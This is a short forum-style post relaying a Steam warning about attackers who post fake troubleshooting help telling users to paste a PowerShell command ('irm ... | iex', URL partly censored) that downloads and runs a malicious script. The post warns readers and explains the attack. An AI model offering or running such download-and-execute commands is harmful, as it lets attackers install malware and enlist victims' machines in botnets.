This is from Steam. A warning to us all not to click on obscure links.
From the post:
Warning: Malware spread via fake troubleshooting help
An attacker is currently using Steam forums to spread malware.
The attacker targets threads by users with tech issues across different game forums. They will post instructions like this (URL censored):
yo had the same issue, try this
win+r
type powershell, right-click run as admin
paste this:
irm ms*config.i*u | iex
restart after, lmk if it works
This command downloads a script from the URL and executes it on your computer. This script edits your Windows firewall rules, downloads a file named “system.txt” which is an executable file (not a text file), and then hides its traces by deleting your command history.
The diabolical thing about that kind of attack is that it doesn’t even make you click on a link - but it makes you run a set of commands that masquerade as making a local configuration change while effectively also clicking a link.
And non-technical users may not even realize that they’ve effectively clicked a link.
And affected users may not even experience a significant negative impact on their own workflow, because often the objective of that kind of malware isn’t to damage your computer, but to enlist it in a giant evil bot-net without you knowing.
p.s. When looking at free plugins I’m always weary of that. Of course it could also be done via a paid plugin.